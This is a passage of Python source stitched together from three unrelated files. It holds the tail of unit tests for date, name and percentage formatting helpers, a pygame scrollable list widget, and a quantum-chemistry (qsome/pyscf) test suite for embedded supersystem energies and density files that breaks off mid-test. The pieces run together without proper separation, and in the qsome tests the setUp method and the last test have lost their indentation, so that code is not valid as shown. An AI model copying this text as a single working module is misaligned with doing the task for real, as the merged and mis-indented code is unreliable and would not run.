        format_value = format_str_as_month_year_date(month_year_date)
        self.assertEqual(format_value, 'March 2018')

    def test_format_str_as_date(self):
        # Given
        date = '02/03/2017'
        # When
        format_value = format_str_as_date(date)
        self.assertEqual(format_value, '02 March 2017')

    # format_household_member_name should join the non-empty name parts with
    # single spaces, ignoring None/empty entries and trimming whitespace
    def test_format_household_member_name(self):
        # Given
        name = ['John', 'Doe']
        # When
        format_value = format_household_member_name(name)
        self.assertEqual(format_value, 'John Doe')

    def test_format_household_member_name_no_surname(self):
        # Given
        name = ['John', '']
        # When
        format_value = format_household_member_name(name)
        self.assertEqual(format_value, 'John')

    def test_format_household_member_name_surname_is_none(self):
        # Given
        name = ['John', None]
        # When
        format_value = format_household_member_name(name)
        self.assertEqual(format_value, 'John')

    def test_format_household_member_name_no_first_name(self):
        # Given
        name = ['', 'Doe']
        # When
        format_value = format_household_member_name(name)
        self.assertEqual(format_value, 'Doe')

    def test_format_household_member_name_first_name_is_none(self):
        # Given
        name = [None, 'Doe']
        # When
        format_value = format_household_member_name(name)
        self.assertEqual(format_value, 'Doe')

    def test_format_household_member_name_first_middle_and_last(self):
        # Given
        name = ['John', 'J', 'Doe']
        # When
        format_value = format_household_member_name(name)
        self.assertEqual(format_value, 'John J Doe')

    def test_format_household_member_name_no_middle_name(self):
        # Given
        name = ['John', '', 'Doe']
        # When
        format_value = format_household_member_name(name)
        self.assertEqual(format_value, 'John Doe')

    def test_format_household_member_name_middle_name_is_none(self):
        # Given
        name = ['John', None, 'Doe']
        # When
        format_value = format_household_member_name(name)
        self.assertEqual(format_value, 'John Doe')

    def test_format_household_member_name_trim_spaces(self):
        # Given
        name = ['John ', ' Doe ']
        # When
        format_value = format_household_member_name(name)
        self.assertEqual(format_value, 'John Doe')

    def test_format_percentage(self):
        # accepts both strings and numbers
        self.assertEqual(format_percentage('100'), '100%')
        self.assertEqual(format_percentage(100), '100%')
        self.assertEqual(format_percentage(4.5), '4.5%')
|
import pygame
import tydev
from tydev.gui.template import Template
class List(Template):
    """A scrollable, selectable vertical list of drawable GUI objects.

    Each item appended is expected to behave like a Template widget: it
    exposes ``draw()``, ``update(delta)``, ``event(event, delta)``, an
    ``image`` surface, and a ``location`` attribute.
    """

    def __init__(self, location, size):
        Template.__init__(self, location=location, size=size)
        self.background_color = (255, 255, 255)
        self.highlight_color = (130, 145, 255)
        self.objects = []
        # Scroll state, in pixels.
        self.scroll_amount = 0.0
        self.scroll_max = 0.0
        self.scroll_speed = 25.0
        # Index of the selected item; -1 means no selection.
        self.selected = -1
        # Maps str(y offset of item top) -> item index, rebuilt on each draw.
        self.map = {}
        self.list_height = 0.0
        # Dirty flag: the list image is only re-rendered when this is True.
        self.redraw = True
        self.object_images = []
        self.scrollbar_location = [0, 0]
        self.scrollbar_bounds = [0, 0]
        self.scrollbar_width = 10
        self.scrollbar_color = (120, 130, 230, 255)
        self.scrollbar_backcolor = (50, 50, 50, 120)

    def append(self, object):
        """Add an item to the end of the list and mark it for re-render."""
        self.objects.append(object)
        self.redraw = True

    def clear(self):
        """Remove all items and mark the list for re-render."""
        self.objects.clear()
        self.redraw = True

    def count(self):
        """Return the number of items in the list."""
        return len(self.objects)

    def draw(self):
        """Render the items, selection highlight, and scrollbar onto
        ``self.image``. Only re-renders when ``self.redraw`` is set."""
        if self.redraw:
            self.redraw = False
            # Render all the objects in the list
            self.object_images = []
            for obj in self.objects:
                obj.draw()
                self.object_images.append(obj.image)
            self.image.fill(self.background_color)
            # Place each list object onto the list image
            y = -self.scroll_amount
            self.list_height = 0.0
            index = 0
            self.map.clear()
            for img in self.object_images:
                # Remap the y locations of each object
                self.map[str(y)] = index
                # Highlight image if selected
                if self.selected == index:
                    height = img.get_height()
                    width = self.image.get_width()
                    pygame.draw.rect(self.image, self.highlight_color,
                                     (0, y, width, height))
                index += 1
                # Draw the image
                self.image.blit(img, (0, y))
                y += img.get_height()
                self.list_height += img.get_height()
            self.scroll_max = self.list_height - self.size[1]
            # Draw scrollbar only when the content overflows the viewport
            if self.list_height > self.size[1]:
                x = self.image.get_width() - self.scrollbar_width
                y = 0
                w = self.scrollbar_width
                h = self.image.get_height()
                self.scrollbar_bounds = (x, h)
                pygame.draw.rect(self.image, self.scrollbar_backcolor, (int(x), int(y), int(w), int(h)), 0)
                # Thumb height/position proportional to visible fraction
                h = (self.size[1] / self.list_height) * self.size[1]
                y = (self.size[1] - h + 1) * (self.scroll_amount / self.scroll_max)
                pygame.draw.rect(self.image, self.scrollbar_color, (int(x), int(y), int(w), int(h)), 0)

    def move(self, amount):
        """Move the selection by ``amount`` items, clamped to valid indices."""
        self.selected += amount
        if self.selected < 0:
            self.selected = 0
        elif self.selected >= len(self.objects):
            self.selected = len(self.objects) - 1
        # Selection changed, so the highlight must be re-rendered.
        self.redraw = True

    def event(self, event, delta):
        """Handle scroll-wheel scrolling, click selection, and arrow-key
        navigation, then forward the event to every item."""
        if self.mouse_over():
            if event.type == pygame.MOUSEWHEEL:
                if self.list_height > self.size[1]:
                    self.scroll_amount -= event.y * self.scroll_speed
                    if self.scroll_amount > self.scroll_max:
                        self.scroll_amount = self.scroll_max
                    elif self.scroll_amount < 0:
                        self.scroll_amount = 0
                    # Scroll offset changed; re-render on next draw.
                    self.redraw = True
            elif event.type == pygame.MOUSEBUTTONDOWN:
                if event.button == 1 or event.button == 3:
                    if self.mouse_over():
                        mouse = self.get_relative_mouse()
                        y = mouse[1]
                        # Keys were inserted top-to-bottom, so the last key
                        # above the cursor is the clicked item.
                        for index in self.map:
                            if y > float(index):
                                self.selected = self.map[index]
                        self.redraw = True
            elif event.type == pygame.KEYDOWN:
                if self.has_focus:
                    # BUG FIX: KEYDOWN events carry the key code in
                    # `event.key` — `event.button` does not exist on them
                    # and raised AttributeError.
                    if event.key == pygame.K_UP:
                        self.move(-1)
                    elif event.key == pygame.K_DOWN:
                        # BUG FIX: down arrow moves the selection forward
                        # (previously called move(-1), same as up).
                        self.move(1)
        index = 0
        height = 0
        for obj in self.objects:
            # Reposition each item to its on-screen location, then let the
            # item handle the event itself.
            y = self.location[1] + height - self.scroll_amount
            x = self.location[0]
            height += obj.image.get_height()
            obj.location = [x, y]
            obj.event(event, delta)
            index += 1

    def update(self, delta):
        """Propagate the per-frame update to every item."""
        for obj in self.objects:
            obj.update(delta)
# A module to tests the methods of the SuperSystem
import unittest
import os
import shutil
import re
from copy import copy
from qsome import cluster_subsystem, cluster_supersystem, helpers
from pyscf import gto, lib, scf, dft
import numpy as np
import scipy as sp
import tempfile
class TestClusterSuperSystemMethods(unittest.TestCase):
def setUp(self):
mol1 = gto.Mole()
mol1.verbose = 3
mol1.atom = '''
O 0.000000 0.000000 0.000000
H 0.758602 0.000000 0.504284
H 0.758602 0.000000 -0.504284'''
mol1.basis = 'cc-pVDZ'
mol1.build()
self.cs_mol1 = mol1
mol2 = gto.Mole()
mol2.verbose = 3
mol2.atom = '''
O 0.000000 10.000000 0.000000
H 0.758602 10.000000 0.504284
H 0.758602 10.000000 -0.504284'''
mol2.basis = 'cc-pVDZ'
mol2.build()
self.cs_mol2 = mol2
mol3 = gto.Mole()
mol3.verbose = 3
mol3.atom = '''
He 1.0 20.0 0.0
He 3.0 20.0 0.0'''
mol3.basis = '3-21g'
mol3.build()
self.cs_mol3 = mol3
mol4 = gto.Mole()
mol4.verbose = 3
mol4.atom = '''
H 0. -2.757 2.857
H 0. 2.757 2.857
ghost:H 0. 0. 2.857
'''
mol4.basis = '3-21g'
mol4.build()
self.env_method = 'lda'
self.cs_mol4 = mol4
mol5 = gto.Mole()
mol5.verbose = 3
mol5.atom = '''
H 0. -2.757 2.857
H 0. 2.757 2.857
ghost:H 0. 0. 2.857
He 1.0 20.0 0.0
He 3.0 20.0 0.0
'''
mol5.basis = '3-21g'
mol5.build()
self.cs_mol34 = mol4
mol6 = gto.Mole()
mol6.verbose = 3
mol6.atom = '''
He 3.0 0.0 0.0'''
mol6.basis = '3-21g'
mol6.build()
self.cs_mol5 = mol6
os_mol1 = gto.Mole()
os_mol1.verbose = 3
os_mol1.atom = '''
Li 0.0 0.0 0.0
'''
os_mol1.basis = '3-21g'
os_mol1.spin = 1
os_mol1.build()
self.os_mol1 = os_mol1
os_mol2 = gto.Mole()
os_mol2.verbose = 3
os_mol2.atom = '''
Li 0.0 0.0 0.0
He 3.0 0.0 0.0
'''
os_mol2.basis = '3-21g'
os_mol2.spin = 1
os_mol2.build()
self.os_mol16 = os_mol2
os_mol3 = gto.Mole()
os_mol3.verbose = 3
os_mol3.atom = '''
H 1.595 0.0 0.0'''
os_mol3.basis = '3-21g'
os_mol3.spin = -1
os_mol3.build()
self.os_mol2 = os_mol3
os_mol4 = gto.Mole()
os_mol4.verbose = 3
os_mol4.atom = '''
O 1.94 0.0 0.0'''
os_mol4.basis = '3-21g'
os_mol4.spin = 2
os_mol4.build()
self.os_mol3 = os_mol4
mol8 = gto.Mole()
mol8.verbose = 3
mol8.atom = '''
Li 0.0 0.0 0.0
H 1.595 0.0 0.0'''
mol8.basis = '3-21g'
mol8.build()
self.cs_mol13 = mol8
    def test_init_densities(self):
        """The supersystem initial density must match the initial density
        of an independent SCF on the concatenated molecule, for the
        closed-shell, unrestricted, and restricted open-shell cases."""
        env_method = 'lda'
        hl_method = 'ccsd'
        #Closed Shell
        subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, env_method, hl_method)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, env_method)
        mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
        fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, max_cycle=2)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj)
        supersystem.init_density()
        # Reference: a plain SCF on the same combined molecule.
        scf_obj = helpers.gen_scf_obj(mol12, env_method, max_cycle=2)
        scf_obj.kernel()
        init_dmat = scf_obj.make_rdm1()
        # fs_dmat stores alpha and beta separately; sum for the restricted case.
        self.assertTrue(np.allclose(init_dmat, supersystem.fs_dmat[0] + supersystem.fs_dmat[1]))
        self.assertTrue(np.allclose(init_dmat, supersystem.get_emb_dmat()))
        #Unrestricted
        subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, env_method, hl_method, unrestricted=True)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, env_method, unrestricted=True)
        mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
        fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True, max_cycle=2)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, unrestricted=True)
        supersystem.init_density()
        scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True, max_cycle=2)
        scf_obj.kernel()
        init_dmat = scf_obj.make_rdm1()
        self.assertTrue(np.allclose(init_dmat, supersystem.fs_dmat))
        #Restricted Open Shell
        subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, env_method, hl_method)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, env_method)
        mol12 = helpers.concat_mols([self.os_mol1, self.cs_mol2])
        fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, max_cycle=2)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj)
        supersystem.init_density()
        scf_obj = helpers.gen_scf_obj(mol12, env_method, max_cycle=2)
        scf_obj.kernel()
        init_dmat = scf_obj.make_rdm1()
        self.assertTrue(np.allclose(init_dmat, supersystem.fs_dmat))
    def test_get_supersystem_energy(self):
        """The full-system KS-DFT energy and density from the supersystem
        must match direct pyscf RKS/UKS/ROKS calculations on the same
        combined molecule, truncated at the same cycle count."""
        #Closed Shell
        hl_method = 'ccsd'
        env_method = 'b3lyp'
        # NOTE(review): subsystems use self.env_method ('lda') while the
        # full system uses the local env_method ('b3lyp'); confirm this
        # mixing of functionals is intentional.
        subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, self.env_method, hl_method)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, self.env_method)
        mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
        fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, max_cycle=3)
        fs_scf_obj.verbose = 4
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao')
        supersystem.init_density()
        supsystem_e = supersystem.get_supersystem_energy()
        # Reference RKS with identical settings (xc, cycles, init guess).
        test_scf = dft.RKS(supersystem.mol.copy())
        test_scf.xc = env_method
        test_scf.verbose = 4
        test_scf.max_cycle=3
        test_e = test_scf.kernel(init_guess='minao')
        test_dmat = test_scf.make_rdm1()
        self.assertAlmostEqual(test_e, supsystem_e)
        self.assertTrue(np.allclose(test_dmat, (supersystem.fs_dmat[0] + supersystem.fs_dmat[1])))
        # Unrestricted Open Shell
        subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, hl_unrestricted=True, unrestricted=True)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method)
        mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
        fs_scf_obj = helpers.gen_scf_obj(mol13, env_method, unrestricted=True, max_cycle=3)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', unrestricted=True)
        supersystem.init_density()
        supsystem_e = supersystem.get_supersystem_energy()
        test_scf = dft.UKS(supersystem.mol.copy())
        test_scf.xc = env_method
        test_scf.max_cycle=3
        test_e = test_scf.kernel()
        test_dmat = test_scf.make_rdm1()
        self.assertAlmostEqual(test_e, supsystem_e)
        # Compare alpha and beta densities separately.
        self.assertTrue(np.allclose(test_dmat[0], supersystem.fs_dmat[0]))
        self.assertTrue(np.allclose(test_dmat[1], supersystem.fs_dmat[1]))
        # Restricted Open Shell
        subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method)
        mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
        fs_scf_obj = helpers.gen_scf_obj(mol13, env_method, max_cycle=3)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao')
        supersystem.init_density()
        supsystem_e = supersystem.get_supersystem_energy()
        test_scf = dft.ROKS(supersystem.mol.copy())
        test_scf.xc = env_method
        test_scf.max_cycle=3
        test_e = test_scf.kernel()
        test_dmat = test_scf.make_rdm1()
        self.assertAlmostEqual(test_e, supsystem_e)
        self.assertTrue(np.allclose(test_dmat[0], supersystem.fs_dmat[0]))
        self.assertTrue(np.allclose(test_dmat[1], supersystem.fs_dmat[1]))
    @unittest.skip
    def test_save_fs_density(self):
        """save_fs_density_file() must write cube files identical to ones
        generated directly with pyscf's cubegen from the same density.

        The first 99 characters of each cube file (the header, which
        contains run-specific metadata) are excluded from the comparison.
        Currently skipped.
        """
        from pyscf.tools import cubegen
        t_file = tempfile.NamedTemporaryFile()
        hl_method = 'ccsd'
        env_method = 'b3lyp'
        #Closed Shell
        subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, self.env_method, hl_method, filename=t_file.name)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, self.env_method, filename=t_file.name)
        mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
        fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, max_cycle=3)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
        supersystem.init_density()
        supersystem.get_supersystem_energy()
        supersystem.save_fs_density_file()
        true_ftmp = tempfile.NamedTemporaryFile()
        chkfile_index = supersystem.chkfile_index
        # Restricted: total density is alpha + beta.
        sup_dmat = supersystem.fs_dmat[0] + supersystem.fs_dmat[1]
        cubegen.density(supersystem.mol, true_ftmp.name, sup_dmat)
        with open(t_file.name + '_' + chkfile_index + '_fs.cube', 'r') as fin:
            test_den_data = fin.read()
        with open(true_ftmp.name, 'r') as fin:
            true_den_data = fin.read()
        self.assertEqual(test_den_data[99:], true_den_data[99:])
        #Unrestricted
        subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name, unrestricted=True)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, filename=t_file.name, unrestricted=True)
        mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
        fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True, max_cycle=3)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name, unrestricted=True)
        supersystem.init_density()
        supersystem.get_supersystem_energy()
        supersystem.save_fs_density_file()
        true_ftmp = tempfile.NamedTemporaryFile()
        chkfile_index = supersystem.chkfile_index
        # Unrestricted: alpha and beta densities are written to separate files.
        sup_dmat = supersystem.fs_dmat[0]
        cubegen.density(supersystem.mol, true_ftmp.name, sup_dmat)
        with open(t_file.name + '_' + chkfile_index + '_fs_alpha.cube', 'r') as fin:
            test_den_data = fin.read()
        with open(true_ftmp.name, 'r') as fin:
            true_den_data = fin.read()
        self.assertEqual(test_den_data[99:], true_den_data[99:])
        sup_dmat = supersystem.fs_dmat[1]
        cubegen.density(supersystem.mol, true_ftmp.name, sup_dmat)
        with open(t_file.name + '_' + chkfile_index + '_fs_beta.cube', 'r') as fin:
            test_den_data = fin.read()
        with open(true_ftmp.name, 'r') as fin:
            true_den_data = fin.read()
        self.assertEqual(test_den_data[99:], true_den_data[99:])
        #Restricted Open Shell
        subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method, filename=t_file.name)
        mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
        fs_scf_obj = helpers.gen_scf_obj(mol13, env_method, max_cycle=3)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
        supersystem.init_density()
        supersystem.get_supersystem_energy()
        supersystem.save_fs_density_file()
        true_ftmp = tempfile.NamedTemporaryFile()
        chkfile_index = supersystem.chkfile_index
        sup_dmat = supersystem.fs_dmat[0]
        cubegen.density(supersystem.mol, true_ftmp.name, sup_dmat)
        with open(t_file.name + '_' + chkfile_index + '_fs_alpha.cube', 'r') as fin:
            test_den_data = fin.read()
        with open(true_ftmp.name, 'r') as fin:
            true_den_data = fin.read()
        self.assertEqual(test_den_data[99:], true_den_data[99:])
        sup_dmat = supersystem.fs_dmat[1]
        cubegen.density(supersystem.mol, true_ftmp.name, sup_dmat)
        with open(t_file.name + '_' + chkfile_index + '_fs_beta.cube', 'r') as fin:
            test_den_data = fin.read()
        with open(true_ftmp.name, 'r') as fin:
            true_den_data = fin.read()
        self.assertEqual(test_den_data[99:], true_den_data[99:])
    @unittest.skip
    def test_save_fs_spin_density(self):
        """save_fs_spin_density_file() must write a cube of the spin
        density (alpha - beta) identical to one generated directly with
        pyscf's cubegen. Headers (first 99 chars) are excluded from the
        comparison. Currently skipped.
        """
        from pyscf.tools import cubegen
        t_file = tempfile.NamedTemporaryFile()
        hl_method = 'ccsd'
        env_method = 'b3lyp'
        #Unrestricted
        subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name, unrestricted=True)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, filename=t_file.name, unrestricted=True)
        mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
        fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True, max_cycle=3)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name, unrestricted=True)
        supersystem.init_density()
        supersystem.get_supersystem_energy()
        supersystem.save_fs_spin_density_file()
        true_ftmp = tempfile.NamedTemporaryFile()
        chkfile_index = supersystem.chkfile_index
        sup_dmat = supersystem.fs_dmat
        # Spin density = alpha density - beta density.
        cubegen.density(supersystem.mol, true_ftmp.name, np.subtract(sup_dmat[0], sup_dmat[1]))
        with open(t_file.name + '_' + chkfile_index + '_fs_spinden.cube', 'r') as fin:
            test_den_data = fin.read()
        with open(true_ftmp.name, 'r') as fin:
            true_den_data = fin.read()
        self.assertEqual(test_den_data[99:], true_den_data[99:])
        #Restricted Open Shell
        subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method, filename=t_file.name)
        mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
        fs_scf_obj = helpers.gen_scf_obj(mol13, env_method, max_cycle=3)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
        supersystem.init_density()
        supersystem.get_supersystem_energy()
        supersystem.save_fs_spin_density_file()
        true_ftmp = tempfile.NamedTemporaryFile()
        chkfile_index = supersystem.chkfile_index
        sup_dmat = supersystem.fs_dmat
        cubegen.density(supersystem.mol, true_ftmp.name, np.subtract(sup_dmat[0], sup_dmat[1]))
        with open(t_file.name + '_' + chkfile_index + '_fs_spinden.cube', 'r') as fin:
            test_den_data = fin.read()
        with open(true_ftmp.name, 'r') as fin:
            true_den_data = fin.read()
        self.assertEqual(test_den_data[99:], true_den_data[99:])
    @unittest.skip
    def test_save_fs_orbs(self):
        """save_fs_orbital_file() must write molden orbital files identical
        to ones generated directly with pyscf's molden.from_mo for
        closed-shell, unrestricted, and restricted open-shell systems.
        Currently skipped.
        """
        from pyscf.tools import molden
        t_file = tempfile.NamedTemporaryFile()
        hl_method = 'ccsd'
        env_method = 'b3lyp'
        #Closed Shell
        subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, self.env_method, hl_method, filename=t_file.name)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, self.env_method, filename=t_file.name)
        mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
        fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, max_cycle=3)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
        supersystem.init_density()
        supersystem.get_supersystem_energy()
        sup_mo_coeff = supersystem.fs_scf.mo_coeff
        sup_mo_energy = supersystem.fs_scf.mo_energy
        sup_mo_occ = supersystem.fs_scf.mo_occ
        test_ftmp = tempfile.NamedTemporaryFile()
        chkfile_index = supersystem.chkfile_index
        supersystem.save_fs_orbital_file()
        # Reference molden file generated directly from the converged MOs.
        true_ftmp = tempfile.NamedTemporaryFile()
        molden.from_mo(supersystem.mol, true_ftmp.name, sup_mo_coeff, ene=sup_mo_energy, occ=sup_mo_occ)
        with open(t_file.name + '_' + chkfile_index + '_fs.molden', 'r') as fin:
            test_den_data = fin.read()
        with open(true_ftmp.name, 'r') as fin:
            true_den_data = fin.read()
        self.assertEqual(test_den_data, true_den_data)
        #Unrestricted
        subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name, unrestricted=True)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, filename=t_file.name, unrestricted=True)
        mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
        fs_scf_obj = helpers.gen_scf_obj(mol12, env_method, unrestricted=True, max_cycle=3)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name, unrestricted=True)
        supersystem.init_density()
        supersystem.get_supersystem_energy()
        sup_mo_coeff = supersystem.fs_scf.mo_coeff
        sup_mo_energy = supersystem.fs_scf.mo_energy
        sup_mo_occ = supersystem.fs_scf.mo_occ
        supersystem.save_fs_orbital_file()
        true_ftmp = tempfile.NamedTemporaryFile()
        chkfile_index = supersystem.chkfile_index
        # Unrestricted: alpha and beta orbitals are written to separate files.
        molden.from_mo(supersystem.mol, true_ftmp.name, sup_mo_coeff[0], ene=sup_mo_energy[0], occ=sup_mo_occ[0], spin="Alpha")
        with open(t_file.name + '_' + chkfile_index + '_fs_alpha.molden', 'r') as fin:
            test_den_data = fin.read()
        with open(true_ftmp.name, 'r') as fin:
            true_den_data = fin.read()
        self.assertEqual(test_den_data, true_den_data)
        molden.from_mo(supersystem.mol, true_ftmp.name, sup_mo_coeff[1], ene=sup_mo_energy[1], occ=sup_mo_occ[1], spin="Beta")
        with open(t_file.name + '_' + chkfile_index + '_fs_beta.molden', 'r') as fin:
            test_den_data = fin.read()
        with open(true_ftmp.name, 'r') as fin:
            true_den_data = fin.read()
        self.assertEqual(test_den_data, true_den_data)
        #Restricted Open Shell
        subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, filename=t_file.name)
        subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol3, self.env_method, filename=t_file.name)
        mol13 = helpers.concat_mols([self.os_mol1, self.cs_mol3])
        fs_scf_obj = helpers.gen_scf_obj(mol13, env_method, max_cycle=3)
        supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], env_method, fs_scf_obj, init_guess='minao', filename=t_file.name)
        supersystem.init_density()
        supersystem.get_supersystem_energy()
        sup_mo_coeff = supersystem.fs_scf.mo_coeff
        sup_mo_energy = supersystem.fs_scf.mo_energy
        sup_mo_occ = supersystem.fs_scf.mo_occ
        supersystem.save_fs_orbital_file()
        true_ftmp = tempfile.NamedTemporaryFile()
        chkfile_index = supersystem.chkfile_index
        molden.from_mo(supersystem.mol, true_ftmp.name, sup_mo_coeff, ene=sup_mo_energy, occ=sup_mo_occ)
        with open(t_file.name + '_' + chkfile_index + '_fs.molden', 'r') as fin:
            test_den_data = fin.read()
        with open(true_ftmp.name, 'r') as fin:
            true_den_data = fin.read()
        self.assertEqual(test_den_data, true_den_data)
def test_get_emb_subsys_elec_energy(self):
# Closed Shell
hl_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(self.cs_mol1, self.env_method, hl_method)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.cs_mol2, self.env_method)
mol12 = helpers.concat_mols([self.cs_mol1, self.cs_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao')
supersystem.init_density()
supersystem.update_fock()
mf = dft.RKS(supersystem.mol)
mf.xc = self.env_method
mf_t_dmat = mf.get_init_guess(key='minao')
mf_init_dmat = np.zeros_like(mf_t_dmat)
#get energies of two embedded systems.
s2s = supersystem.sub2sup
mf_init_dmat[np.ix_(s2s[0], s2s[0])] += subsys.get_dmat()
mf_init_dmat[np.ix_(s2s[1], s2s[1])] += subsys2.get_dmat()
mf_hcore = mf.get_hcore()
mf_init_veff = mf.get_veff(dm=mf_init_dmat)
dm_1 = mf_init_dmat[np.ix_(s2s[0], s2s[0])]
hcore_1_emb = mf_hcore[np.ix_(s2s[0], s2s[0])]
veff_1_emb = mf_init_veff[np.ix_(s2s[0], s2s[0])]
mf_1 = dft.RKS(self.cs_mol1)
mf_1.xc = self.env_method
mf_1.grids = supersystem.fs_scf_obj.grids
hcore_1_emb = hcore_1_emb - mf_1.get_hcore()
veff_1 = mf_1.get_veff(dm=dm_1)
veff_1_emb = veff_1_emb - veff_1
test_sub1_e = mf_1.energy_elec(dm=dm_1)[0] + np.einsum('ij,ji', hcore_1_emb, dm_1) + np.einsum('ij,ji', veff_1_emb, dm_1)
dm_2 = mf_init_dmat[np.ix_(s2s[1], s2s[1])]
hcore_2_emb = mf_hcore[np.ix_(s2s[1], s2s[1])]
veff_2_emb = mf_init_veff[np.ix_(s2s[1], s2s[1])]
mf_2 = dft.RKS(self.cs_mol2)
mf_2.xc = self.env_method
mf_2.grids = supersystem.fs_scf_obj.grids
hcore_2_emb = hcore_2_emb - mf_2.get_hcore()
veff_2 = mf_2.get_veff(dm=dm_2)
veff_2_emb = veff_2_emb - veff_2
test_sub2_e = mf_2.energy_elec(dm=dm_2)[0] + np.einsum('ij,ji', hcore_2_emb, dm_2) + np.einsum('ij,ji', veff_2_emb, dm_2)
sub1_e = supersystem.subsystems[0].get_env_elec_energy()
sub2_e = supersystem.subsystems[1].get_env_elec_energy()
self.assertAlmostEqual(test_sub1_e, sub1_e, delta=1e-8)
self.assertAlmostEqual(test_sub2_e, sub2_e, delta=1e-8)
# Unrestricted Open Shell
hl_method = 'ccsd'
subsys = cluster_subsystem.ClusterHLSubSystem(self.os_mol1, self.env_method, hl_method, unrestricted=True, hl_unrestricted=True)
subsys2 = cluster_subsystem.ClusterEnvSubSystem(self.os_mol2, self.env_method, unrestricted=True)
mol12 = helpers.concat_mols([self.os_mol1, self.os_mol2])
fs_scf_obj = helpers.gen_scf_obj(mol12, self.env_method, unrestricted=True)
supersystem = cluster_supersystem.ClusterSuperSystem([subsys, subsys2], self.env_method, fs_scf_obj, init_guess='minao')
supersystem.init_density()
supsystem_e = supersystem.get_supersystem_energy()
mf = dft.UKS(supersystem.mol)
mf.xc = self.env_method
mf_t_dmat = mf.get_init_guess(key='minao')
mf_init_dmat = np.zeros_like(mf_t_dmat)
#get energies of two embedded systems.
s2s = supersystem.sub2sup
